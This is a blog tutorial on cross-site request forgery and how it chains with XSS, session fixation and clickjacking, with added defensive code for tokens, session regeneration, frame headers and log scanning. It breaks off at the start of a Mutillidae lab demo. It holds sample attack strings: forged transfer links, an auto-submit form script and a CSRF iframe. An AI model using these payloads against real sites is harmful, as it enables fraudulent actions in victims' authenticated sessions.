This article is going to talk about what Cross Site Request Forgery (CSRF) is, explain how someone can perform a successful CSRF attack and describe how to amplify a CSRF attack (e.g. combine CSRF with other vulnerabilities). CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated (simplistically speaking). With a little help from social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. <br />
<br />
A successful CSRF exploit can compromise end user data and operations in the case of a normal user. If the targeted end user is the administrator account, this can compromise the entire web application. More specifically, CSRF is a Web Application vulnerability that has to exploit more than one design flaw in order to be successful. The design flaws that a CSRF attack can take advantage of are:<br />
<ol>
<li>Input Validation (e.g. Convert POST to GET) </li>
<li>Access Control (e.g. Session Fixation) </li>
<li>Privilege Assignment (e.g. Horizontal Privilege Escalation)</li>
</ol>
<b>Note: </b>Of course, depending on the situation, other types of vulnerabilities can be combined with a CSRF as part of a post-exploitation process, such as SQL Injection (e.g. SQL inject the cookie and get access to the valid cookie repository in the database).<br />
<br />
<b>History of CSRF</b><br />
<br />
CSRF vulnerabilities have been known and in some cases exploited since 2001. Because it is carried out from the user's IP address, some website logs might not have evidence of CSRF. Exploits are under-reported, at least publicly, and as of 2007 there are few well-documented examples. About 18 million users of eBay's Internet Auction Co. at Auction.co.kr in Korea lost personal information in February 2008. Customers of a bank in Mexico were attacked in early 2008 with an image tag in email. The link in the image tag changed the DNS entry for the bank in their ADSL router to point to a malicious website impersonating the bank.</div>
<div>
<br /></div>
<div>
<b>Severity of CSRF</b></div>
<div>
<br /></div>
<div>
According to the United States Department Of Homeland Security the most dangerous CSRF vulnerability ranks in at the 909th most dangerous software bug ever found. Other severity metrics have been issued for CSRF vulnerabilities that result in remote code execution with root privileges as well as a vulnerability that can compromise a root certificate, which will completely undermine a public key infrastructure.</div>
<div>
<b><br /></b></div>
<div>
<b>But what exactly is a CSRF</b></div>
<div>
<br /></div>
<div>
CSRF is a form of confused deputy attack. Imagine you’re a malcontent who wants to harm another person in a maximum security jail. You’re probably going to have a tough time reaching that person due to your lack of proper credentials. A potentially easier approach to accomplish your misdeed is to confuse a deputy to misuse his authority to commit the dastardly act on your behalf. That’s a much more effective strategy for causing mayhem.</div>
<div>
<br />
In the case of a CSRF attack, the confused deputy is your browser. After logging into a website, the website will issue your browser an authentication token within a cookie (well, not always). With each subsequent HTTP POST or GET request sent, the cookie bound to the request lets the site know that you are authorized to take whatever action you are taking. Here I am referring to the typical authentication and authorization scheme that most Web Applications use.<br />
<br />
Suppose you visit a malicious website soon after visiting your bank website, or visit another website while being logged in to your bank web account. Your session on the previous site might still be valid (by the way, please invalidate your session, i.e. log out, before closing the browser). Thus, visiting a carefully crafted malicious website (perhaps you clicked on a spam link) could cause an HTML form POST to the previous website. Your browser would send the authentication cookie back to that site and appear to be making a request on your behalf, even though you did not intend to do so.<br />
<br />
<b>Yes but what is a CSRF</b><br />
<br />
A CSRF is a POST or GET HTTP request that, when sent to the vulnerable Web Application under certain conditions, can cause the Web Application to perform an action on behalf of the user. Now, meaningful CSRF attacks are those that can cause loss of Integrity, Confidentiality or Availability of the victim user's data. For example, if an e-Banking Web site is vulnerable to CSRF and the function of the Web Site that is vulnerable is responsible for transferring money, then this is a CSRF with high severity and should be fixed.</div>
<div>
<br /></div>
<div>
This is an example of a simple CSRF:<br />
<br /></div>
<table align="center" bgcolor="00CCFF" border="1">
<tbody>
<tr>
<td>http://www.vulnerable.com/?transferEuros=3000&amp;maliciousUserAccount=9832487 </td>
</tr>
</tbody></table>
<div>
<br /></div>
<div>
<b>Note:</b> The link displayed above, when clicked, can authorize a malicious user to transfer 3000 euros from the victim user's account to the malicious user's account with id 9832487, assuming of course that no proper countermeasures have been taken.</div>
<div>
<br />
The following diagram shows in more detail how this can happen: </div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaspRDp99PLR6G5IZ0kp97tyTjr4zS8ZWrWqANS30Bb6nkIPX8Ssb_1szezXA54_WAo6F3SgjrSpmgKsdaIMO4GzveBRORCVFNGkBmviMaP8LF8NjdO4JS3DJ0TjnEEFMeIOqkgELKZxk/s1600/Drawing1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaspRDp99PLR6G5IZ0kp97tyTjr4zS8ZWrWqANS30Bb6nkIPX8Ssb_1szezXA54_WAo6F3SgjrSpmgKsdaIMO4GzveBRORCVFNGkBmviMaP8LF8NjdO4JS3DJ0TjnEEFMeIOqkgELKZxk/s1600/Drawing1.png" /></a></div>
<br />
<br /></div>
<div>
<b>Note:</b> The diagram above shows the steps an attacker can take to exploit the vulnerability (step 4 designates the execution of the CSRF payload that performs the malicious action). It is pretty much similar to a Cross Site Scripting attack scenario. An attacker sends an e-mail to an HTML-enabled e-mail client that contains some sample images deliberately uploaded to a malicious server (controlled by the attacker), along with the malicious URL (or a malicious HTML form) that performs the CSRF function, then waits until the user opens the e-mail and downloads the images, or sets his/her e-mail to receive a notification when the victim user reads the e-mail. Then he/she waits in front of the logs of the malicious image server or waits to receive a read receipt in his/her mailbox. After the image is downloaded or the read receipt is received he/she will try to verify that the malicious function was executed. Another scenario would be to work out at what times the user interacts with the web site and time the attack accordingly before sending the malicious URL/HTML form.<br />
<br />
The diagram above explains that the CSRF (meaning the vulnerable link described previously) can be injected into an HTML-enabled e-mail and be executed by a legitimate user. Now, if the link (i.e. the CSRF vulnerable link) is bound to the Web Application session (which it should be) then the victim <u>user would have to be logged in to the vulnerable Web Application for the attack to be successful</u>. If the link is not bound to the Web Application session then this is not a CSRF vulnerability; it is an Insecure Direct Object References or Failure to Restrict URL Access vulnerability, both also described in the OWASP Top 10. Both vulnerabilities have to do with inappropriate access control and are completely unrelated to CSRF or CSRF-like vulnerabilities.<br />
<br />
Now that you have a better grasp of what a CSRF attack is, I can be more technical and explain what a CSRF attack looks like at the HTTP request level. The link described above, expressed as an HTTP request, looks like this:<br />
<br />
<table align="center" bgcolor="00CCFF" border="1">
<tbody>
<tr><td>GET /homepage?transferEuros=3000&amp;maliciousUserAccount=9832487 HTTP/1.1</td></tr>
<tr><td>Host: victim.com</td></tr>
<tr><td>Keep-Alive: timeout=15</td></tr>
<tr><td>Connection: Keep-Alive</td></tr>
<tr><td>Cookie: Authentication-Token</td></tr>
<tr><td>Accept: */*</td></tr>
</tbody></table>
<br />
<b>Note:</b> The vulnerable link, when clicked, will generate the GET request shown above and, if it is successful, the application will return a 200 HTTP response saying that the transaction was completed successfully.<br />
<br />
<b>Explaining more what a CSRF is</b><br />
<b><br /></b>
The following diagram shows thoroughly how a CSRF can be exploited:<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPu2NMEc3Ig0YbLUAMsEItnG7r1H-RLm5CALwG0LSK_JnOT1W5qvqFCx86X-tM5_rcc84xiiRE9u4hV70wjTO-ZKQbLBMhNak64R2IjGXICK_7EQf-9miwySN7mRKDMrj6NNy3prFByIQ/s1600/Drawing2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPu2NMEc3Ig0YbLUAMsEItnG7r1H-RLm5CALwG0LSK_JnOT1W5qvqFCx86X-tM5_rcc84xiiRE9u4hV70wjTO-ZKQbLBMhNak64R2IjGXICK_7EQf-9miwySN7mRKDMrj6NNy3prFByIQ/s1600/Drawing2.jpg" /></a></div>
<br />
<b>Step 1</b>: Mallory sends a phishing email to Bob, inviting him to visit her web server in order, for example, to win an iPhone 5. She has already created a web page at her web server with a hidden request to the Web Application where Bob is logged in. She has added some buttons to lure the victim in order to click on her page and win the iPhone!<br />
<div class="p1">
<b><br /></b></div>
<div class="p1">
<b>Step 2</b>: Bob visits the page at Mallory's Web server. Whether or not he is greedy, he clicks on the button in order to win the iPhone!...</div>
<div class="p1">
<b><br /></b></div>
<div class="p1">
<b>Step 3</b>: The forged request is "legitimized" with Bob's logged-in session and is executed at the web application.<br />
<br />
A real-world analogy would be the following: Mallory presents a bank cheque to Bob and Bob puts his name and signature on it, but has not examined what sum of money is written on the cheque. In the following attack scenario, we can see how a malicious user can add a user to a web application just by fooling a logged-in administrator into clicking on a link.<br />
<b><br /></b>
<b>A different approach to CSRF</b></div>
<b><br /></b>
Now that I have explained a simple CSRF attack it is time to explain a more advanced scenario on how to exploit a CSRF. A CSRF most of the time is not easily recognizable, and that is why lots of people cannot identify a CSRF unless it is really obvious, just like the one I just described. A CSRF issue arises when:<br />
<ol>
<li>The Web Application performs critical functions using GET HTTP requests (e.g. transferring money, adding users by just clicking a link etc.).</li>
<li>The Web Application does not distinguish between POST and GET requests (e.g. an HTML form can easily be converted into a GET request, meaning that an HTML POST request can be turned into a link).</li>
<li>The Web Application has loose, i.e. not tight, access control (e.g. it does not use anti-CSRF tokens, is vulnerable to session fixation, etc.).</li>
<li>The Web Application is vulnerable to Cross Site Scripting (e.g. someone can use JavaScript to build a valid HTML POST form using the XMLHTTP object along with an auto-submit script).</li>
<li>The application is passing the session ID in the URL along with the anti-CSRF token.</li>
<li>The session can be fixated and the anti-CSRF token is predictable or static.</li>
</ol>
<b>Note:</b> There are a lot more ways to perform a CSRF attack, but they are out of scope.<br />
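To make the conditions above concrete from the defender's side, here is an added example of my own (it is not code from the post and not Mutillidae code). It shows the money-transfer handler the way the post describes it, i.e. vulnerable (any method, no token, nothing ties the request to the user's intent), next to a hardened version that enforces the three checks that close conditions 1 to 3: state changes only over POST, an Origin/Referer check, and a per-session anti-CSRF token compared in constant time. The <code>Request</code> class, the ledger dictionary and the origin <code>https://www.vulnerable.com</code> are assumptions standing in for whatever framework the application uses; the parameter names are the post's own.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class Request:
    """Constructed stand-in for a framework request object (assumption: the
    real framework exposes method, headers, query string and form body)."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    query: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


# Assumed origin of the application (www.vulnerable.com is the post's example host).
SITE_ORIGIN = "https://www.vulnerable.com"


def issue_csrf_token(session: dict) -> str:
    """One unguessable token per login session, kept server side and embedded
    as a hidden field in every state-changing form the application renders."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _move_money(session: dict, ledger: dict, amount: int, dest: str) -> None:
    ledger[session["user"]] -= amount
    ledger[dest] = ledger.get(dest, 0) + amount


def transfer_vulnerable(request: Request, session: dict, ledger: dict) -> str:
    """The pattern the post describes: any method is accepted, parameters are
    read from the query string or the body, and nothing ties the request to an
    intent of the logged-in user, so a link in an e-mail or an auto-submitted
    form on another site is indistinguishable from a real click."""
    params = {**request.query, **request.form}
    _move_money(session, ledger, int(params["transferEuros"]), params["maliciousUserAccount"])
    return "200 transfer completed"


def _same_origin(request: Request) -> bool:
    """Origin header (or, failing that, Referer) must name the site's own origin."""
    source = request.headers.get("Origin") or request.headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def transfer_hardened(request: Request, session: dict, ledger: dict) -> str:
    """The same function with the three checks a CSRF fix needs."""
    # 1. State changes only over POST: the GET-link trick and the POST-to-GET
    #    interchange described in the post both stop working.
    if request.method != "POST":
        return "405 method not allowed"
    # 2. Origin/Referer must be our own site (defence in depth: the browser
    #    sets these headers and a cross-site page cannot forge them).
    if not _same_origin(request):
        return "403 cross-origin request rejected"
    # 3. The token in the form body must equal the one bound to this session.
    #    Constant-time compare; tokens in the query string are ignored on purpose.
    expected = session.get("csrf_token", "")
    supplied = request.form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "403 missing or invalid anti-CSRF token"
    _move_money(session, ledger, int(request.form["transferEuros"]),
                request.form["maliciousUserAccount"])
    return "200 transfer completed"
```

Feed both functions the same forged GET (the post's link) and the vulnerable one moves the money while the hardened one answers 405; a forged POST from another origin gets 403 before the token is even looked at, and only a POST carrying the token issued to that session goes through.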
<b><br /></b>
<b>CSRF and POST to GET Interchange</b><br />
<br />
It is common knowledge that when the Web Application does not distinguish between POST and GET requests an attacker can convert a POST HTTP request to a GET HTTP request and generate a link equivalent to the one described previously. Burp Suite does that automatically from the Proxy tab: right-click the request and choose "Change request method" (it also recalculates the Content-Length header).<br />
<br />
The attack just described can be enhanced by using an auto-submit script such as this one:<br />
<br />
<table align="center" bgcolor="00CCFF" border="1">
<tbody>
<tr>
<td>&lt;script type="text/javascript"&gt; setTimeout('document.CSRFHtmlForm.submit()', 5000); &lt;/script&gt;</td>
</tr>
</tbody></table>
<br />
<b>Note:</b> A very useful tool is the CSRF PoC generator also found in Burp Suite. Burp Suite's "Generate CSRF PoC" will produce a quick CSRF PoC for you (most of the time you will have to modify it to be realistic).<br />
<br />
<b>CSRF and Cross Site Scripting (XSS)</b><br />
<br />
Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.<br />
<br />
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page. They can also inject an HTML form with an auto-submit script to execute the malicious CSRF. The example is very easy to understand, so I will not give one.<br />
<br />
<b>Note1:</b> You can see how an XSS vulnerability can be combined with a CSRF attack in the CSRF tool section (e.g. by also injecting the auto-submit JavaScript code along with the CSRF form).<br />
<br />
<b>Note2:</b> Of course an XSS can be combined with a CSRF attack using the XMLHTTP and auto-submit JavaScript features. A very good XSS (XMLHTTP)/CSRF example can be found <a href="http://ajaxian.com/archives/gmail-csrf-security-flaw" target="_blank">here</a>. The specific post explains an XSS/CSRF bug found in Gmail.<br />
<br />
<b>CSRF and Session Fixation</b></div>
<div>
<br />
Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack exploits a limitation in the way the vulnerable web application manages the session ID: when authenticating a user, it does not assign a new session ID, making it possible to keep using an existing session ID. The attack consists of inducing a user to authenticate himself with a known session ID, and then hijacking the user-validated session through knowledge of the session ID used. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.<br />
<br />
The Session Fixation attack is a class of Session Hijacking. Classic Session Hijacking steals the established session between the client and the Web Server after the user logs in; Session Fixation instead fixes a session on the victim's browser, so the attack starts before the user logs in. There are several techniques to execute the attack; it depends on how the Web application deals with session tokens. Below are some of the most common techniques:<br />
<ul>
<li>Session token in the URL argument: the Session ID is sent to the victim in a hyperlink and the victim accesses the site through the malicious URL.</li>
<li>Session token in a hidden form field: in this method, the victim must be tricked into authenticating to the target Web Server using a login form developed by the attacker. The form could be hosted on the evil web server or directly in an HTML-formatted e-mail.</li>
<li>Session ID in a cookie:
<ul>
<li>Client-side script: most browsers support the execution of client-side scripting. In this case, the aggressor could use a code injection attack such as XSS (Cross-site scripting) to insert malicious code into the hyperlink sent to the victim and fix a Session ID in its cookie. Using the document.cookie property, the browser which executes the command becomes capable of fixing values inside the cookie that it will use to keep a session between the client and the Web Application.</li>
<li>&lt;META&gt; tag: the &lt;META&gt; tag is also considered a code injection attack; however, unlike the XSS attack, where undesirable scripts can be disabled or their execution denied, the attack using this method is much more efficient because it is impossible to disable the processing of these tags in the browsers.</li>
</ul>
</li>
</ul>
After describing the Session Fixation attack I will explain the attack scenario described in the picture using a new chain of vulnerabilities (e.g. Session Fixation -> CSRF). An attacker sends an e-mail to an HTML-enabled e-mail client that contains some sample images uploaded to a malicious server, along with the malicious URL that performs the CSRF function <u>and this time is bound to the fixated session (by using one or more of the techniques described above)</u>, then waits until the user opens the e-mail and downloads the images, or sets his/her e-mail to receive a notification when the victim user reads the e-mail. Then he/she waits for the logs of the malicious image server to be updated or waits to receive a read receipt in his/her mailbox. After the image is downloaded (and he/she sees that from e.g. /www/var/apache.logs etc.) or the read receipt is received he/she will try to verify that the malicious function was executed.<br />
<div>
<br /></div>
<div>
The link with the fixated token will produce a GET Http request that looks like this:</div>
<div>
<br /></div>
<table align="center" bgcolor="00CCFF" border="1">
<tbody>
<tr><td>GET /homepage?transferEuros=3000&amp;maliciousUserAccount=9832487 HTTP/1.1</td></tr>
<tr><td>Host: victim.com</td></tr>
<tr><td>Keep-Alive: timeout=15</td></tr>
<tr><td>Connection: Keep-Alive</td></tr>
<tr><td>Cookie: <span style="color: red;">Fixated Session </span></td></tr>
</tbody></table>
</div>
<br />
<div>
<b>Note1:</b> Obviously a Session Fixation attack can have devastating results even without a CSRF flaw. What I am saying here is that a Session Fixation combined with a CSRF attack amplifies the attack (e.g. the attacker will optimize his/her attack time frame by exploiting a chain of vulnerabilities rather than a single vulnerability).<br />
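The fix that breaks the Session Fixation -> CSRF chain is to regenerate the session ID at login and to derive the anti-CSRF token from the authenticated session, so that a session an attacker planted before login (via URL, hidden field, injected cookie or &lt;META&gt; tag) never becomes authenticated and any token computed against it is worthless. Here is an added example of mine showing that (not code from the post or from any framework); the in-memory <code>SessionStore</code> and the server secret are assumptions standing in for the application's real session storage.

```python
import hashlib
import hmac
import secrets


class SessionStore:
    """Constructed in-memory session store (assumption: a real application
    would back this with its framework's session storage)."""

    def __init__(self, server_secret: bytes):
        self._secret = server_secret
        self._sessions = {}  # session id -> {"user": ..., "authenticated": bool}

    def start_anonymous(self) -> str:
        """Pre-login session, e.g. the one an attacker tries to fixate."""
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"user": None, "authenticated": False}
        return sid

    def login(self, sid: str, user: str) -> str:
        """Regenerate the session id at the privilege change. Whatever id was
        known before authentication is dropped, so a fixated id never becomes
        an authenticated one; the browser receives the new id in a fresh cookie."""
        self._sessions.pop(sid, None)
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = {"user": user, "authenticated": True}
        return new_sid

    def is_authenticated(self, sid: str) -> bool:
        return self._sessions.get(sid, {}).get("authenticated", False)

    def csrf_token(self, sid: str) -> str:
        """Anti-CSRF token derived from the authenticated session id with a
        server-side secret: neither static nor predictable, and it changes
        together with the id, so a token obtained against a pre-login session
        does not match anything after login."""
        if not self.is_authenticated(sid):
            raise PermissionError("no authenticated session")
        return hmac.new(self._secret, sid.encode(), hashlib.sha256).hexdigest()

    def verify_csrf(self, sid: str, token: str) -> bool:
        """Constant-time check of a submitted token against the session it claims."""
        if not self.is_authenticated(sid):
            return False
        expected = self.csrf_token(sid)
        return hmac.compare_digest(expected.encode(), token.encode())
```

Walk through the chain: the attacker hands the victim a session id, the victim logs in, the store issues a different id and forgets the old one, so the request with the fixated cookie in the table above is simply unauthenticated and its token check fails.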
<div>
<div style="font-weight: bold;">
<br /></div>
<b>Note2:</b> Similar exploitation scenarios arise when the web application does not provide the user with an authentication mechanism, e.g. <u>open registration forms used for submitting credit card details</u>.<br />
<br />
<b>CSRF and bad architecture design</b><br />
<br />
Although this category might not be exactly a CSRF issue, it is still very similar to a CSRF attack. This type of attack refers to the occasions where no proper random values are generated (based on user credentials), or values are generated but do not have session-like behavior, e.g. lack of authorization, non-random CAPTCHA, lack of entity authentication etc. By integrating this type of behavior into your application you expose the application to multiple types of attacks. <br />
<div>
<br /></div>
</div>
<div style="font-weight: bold;">
CSRF and Clickjacking</div>
</div>
<br />
Clickjacking, also known as a "UI redress attack", happens when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top-level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both. Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.<br />
<br />
For example, imagine an attacker who builds a web site that has a button on it that says "click here for a free iPod". However, on top of that web page, the attacker has loaded an iframe with your vulnerable e-banking account, and lined up the "transfer money" button exactly on top of the "free iPod" button. The victim tries to click on the "free iPod" button but instead actually clicks on the invisible "transfer money" button. In essence, the attacker has "hijacked" the user's click, hence the name "Clickjacking". Again, the attack scenario would be similar to the ones just described above, so there is no need for me to modify and explain the attack scenario again. What is interesting, though, would be to show you an iframe that performs a CSRF attack.<br />
<br />
Well, an iframe that performs a CSRF attack would look something like this:<br />
<br />
<table align="center" bgcolor="00CCFF" border="1">
<tbody>
<tr>
<td>&lt;iframe src="http://www.victim.com/homepage?transferEuros=3000&amp;maliciousUserAccount=9832487"&gt;&lt;/iframe&gt;</td>
</tr>
</tbody></table>
<br />
<b>Note:</b> You can see how beautiful this attack is and how simply and smoothly it can be implemented.<br />
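The iframe above only works if the e-banking site lets itself be framed, which is what the response headers decide. As an added example (my own, not from the post), here is the pair of headers an application should send when it is never meant to be embedded, plus a small audit function that classifies any response's headers the way current browsers resolve them: a Content-Security-Policy <code>frame-ancestors</code> directive takes precedence over X-Frame-Options, and the old <code>ALLOW-FROM</code> value is not honoured any more, so it protects nothing. The header values are standard; only the classification strings are mine.

```python
from typing import Dict


def frame_protection_headers() -> Dict[str, str]:
    """Headers for a page that must never be loaded in a frame on another
    origin (assumption: the application has no legitimate framing use)."""
    return {
        "X-Frame-Options": "DENY",
        "Content-Security-Policy": "frame-ancestors 'none'",
    }


def framing_policy(headers: Dict[str, str]) -> str:
    """Classify what a response's headers allow. Header names are matched
    case-insensitively. CSP frame-ancestors wins over X-Frame-Options when
    both are present, which is how current browsers resolve the pair."""
    lowered = {name.lower(): value for name, value in headers.items()}

    csp = lowered.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.strip("'").lower() for s in parts[1:]]
            if sources == ["none"]:
                return "blocked"
            if sources == ["self"]:
                return "same-origin only"
            return "allowed from: " + ", ".join(parts[1:])

    xfo = lowered.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "blocked"
    if xfo == "SAMEORIGIN":
        return "same-origin only"
    if xfo.startswith("ALLOW-FROM"):
        # Deprecated and ignored by current browsers, so the page is frameable.
        return "frameable (ALLOW-FROM is not honoured by current browsers)"
    return "frameable"
```

Run <code>framing_policy</code> over the headers a proxy shows you for the transfer page: an empty result or an <code>ALLOW-FROM</code> means the clickjacking scenario above is open, while "blocked" or "same-origin only" means the iframe trick fails regardless of what the URL inside it does.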
<b><br /></b>
<span style="font-weight: bold;">CSRF and Exposed Session Variables</span><br />
<span style="font-weight: bold;"><br /></span>
Simply passing the session ID or other session variables, such as the anti-CSRF token, in the URL is asking for trouble. The Session Tokens (Cookie, SessionID, Hidden Field), if exposed, will usually enable an attacker to impersonate a victim and access the application illegitimately. As such, it is important that they are protected from eavesdropping at all times, particularly whilst in transit between the client browser and the application servers.<br />
<br />
The information here relates to how transport security applies to the transfer of sensitive Session ID data rather than data in general, and may be stricter than the caching and transport policies applied to the data served by the site. Using a personal proxy, it is possible to ascertain the following about each request and response:<br />
<ul class="ul1">
<li class="li2">Protocol used (e.g., HTTP vs. HTTPS)</li>
<li class="li2">HTTP Headers</li>
<li class="li2">Message Body (e.g., POST or page content)</li>
</ul>
<div class="p1">
Each time Session ID data is passed between the client and the server, the protocol, cache, and privacy directives and body should be examined. Transport security here refers to Session IDs passed in GET or POST requests, message bodies, or other means over valid HTTP requests. As you already understand stealing the Session ID and/or the AntiCSRF token might result in the attacker being able to form links such as the following one:</div>
<div class="p1">
<br /></div>
<div class="p1">
<table align="center" bgcolor="00CCFF" border="1"><tbody>
<tr><td>http://www.vulnerable.com/?<span style="color: red;">sessionid=ligdlgkjdng</span>&amp;<span style="color: red;">anticsrftoken=kjnsdldfksjdnk</span>&amp;transferEuros=3000&amp;maliciousUserAccount=9832487 </td></tr>
</tbody></table>
</div>
<div>
</div>
<br />
<b>Note:</b> The above information can be used by a malicious user to generate such a link.<br />
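Because URLs end up in proxy, browser-history and web-server logs, the leak described here is also easy to detect after the fact. As an added example (mine, not from the post), the scanner below reads Apache combined-format access log lines and flags three things this article has discussed: session IDs or anti-CSRF tokens travelling in the query string, state-changing parameters such as <code>transferEuros</code> sent over GET, and POST requests whose Referer is another host (the shape of the form-based CSRF in the demo that follows). The log lines are constructed for the example; <code>evil.example</code> is a placeholder and <code>192.168.200.14</code> is the attacker host used later in the post. The parameter name lists and the assumed own host <code>www.vulnerable.com</code> are assumptions to adapt to the application.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format: ip ident user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)"'
)

# Parameter names that should never travel in a URL (assumed list; adapt to the app).
SECRET_PARAMS = {"sessionid", "phpsessid", "jsessionid", "anticsrftoken", "csrf_token", "token"}
# Parameters that indicate a state change and therefore must not arrive over GET (assumed list).
STATE_CHANGING = {"transfereuros", "malicioususeraccount", "delete", "password"}

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Dec/2012:10:24:00 -0800] "GET /homepage?transferEuros=3000&maliciousUserAccount=9832487 HTTP/1.1" 200 512 "http://evil.example/win.html" "Mozilla/5.0"',
    '10.0.0.5 - - [26/Dec/2012:10:25:10 -0800] "GET /?sessionid=ligdlgkjdng&anticsrftoken=kjnsdldfksjdnk&transferEuros=3000&maliciousUserAccount=9832487 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [26/Dec/2012:10:26:00 -0800] "POST /index.php?page=register.php HTTP/1.1" 302 0 "http://192.168.200.14/iphone.html" "Mozilla/5.0"',
    '10.0.0.7 - - [26/Dec/2012:10:27:00 -0800] "GET /index.php?page=home.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def scan_access_log(lines, own_host="www.vulnerable.com"):
    """Return (client ip, finding kind, detail) tuples for suspicious requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        ip, method, target, referer = m.group("ip", "method", "target", "referer")
        names = {k.lower() for k, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True)}

        leaked = sorted(names & SECRET_PARAMS)
        if leaked:
            findings.append((ip, "secret-in-url", ",".join(leaked)))

        if method == "GET" and names & STATE_CHANGING:
            findings.append((ip, "state-change-over-GET", target))

        # Cross-site GETs are ordinary navigation, but a POST whose Referer is
        # another host is the signature of a form submitted from an attacker page.
        ref_host = urlsplit(referer).hostname if referer and referer != "-" else None
        if method == "POST" and ref_host is not None and ref_host != own_host:
            findings.append((ip, "cross-site-POST", referer))
    return findings


if __name__ == "__main__":
    for ip, kind, detail in scan_access_log(SAMPLE_LOG):
        print(f"{ip:<10} {kind:<22} {detail}")
```

On the constructed lines this reports the state-changing GET, the request that carries both the session ID and the anti-CSRF token in the URL (flagged twice, once per problem), and the registration POST referred from the attacker's host; the ordinary home-page request produces nothing. A missing Referer is deliberately not treated as a finding, since browsers and privacy extensions strip it routinely.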
<b><br /></b>
<b>The attack scenario?</b><br />
<br />
For my demo I chose the Mutillidae vulnerable web application, which can be found on <a href="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project"><span class="s1">OWASP's Vulnerable Apps VM</span></a>, an intercepting proxy tool (I used <a href="http://www.portswigger.net/burp/download.html"><span class="s1">Portswigger's Burp Proxy</span></a>, however it is not essential; just a "View Source" from any browser works in most cases) and an Apache web server.<br />
<br />
In the following picture you can see the main page of Mutillidae's web application as it can be browsed by any (non-authenticated) user.<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDOXro5aUnQBRMqrs_kR_GEgKPgxsO_GgUA92DLnx89SMTnzy-FLv9Hndf6LepwUVIsWaYBS7nptoy2d7UD9Kq0TAj014ZhdxM6q55TeBerP8kfvpfJGT_epxEnCSg_srZSwN1YpWPM1E/s1600/1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDOXro5aUnQBRMqrs_kR_GEgKPgxsO_GgUA92DLnx89SMTnzy-FLv9Hndf6LepwUVIsWaYBS7nptoy2d7UD9Kq0TAj014ZhdxM6q55TeBerP8kfvpfJGT_epxEnCSg_srZSwN1YpWPM1E/s1600/1a.png" width="640" /></a></div>
<b><br /></b>
<br />
<div class="p1">
In this web application any user can register an account, but our goal is to register an account with the administrator's privileges. Below is the "register user" page that any unauthenticated user can see.</div>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
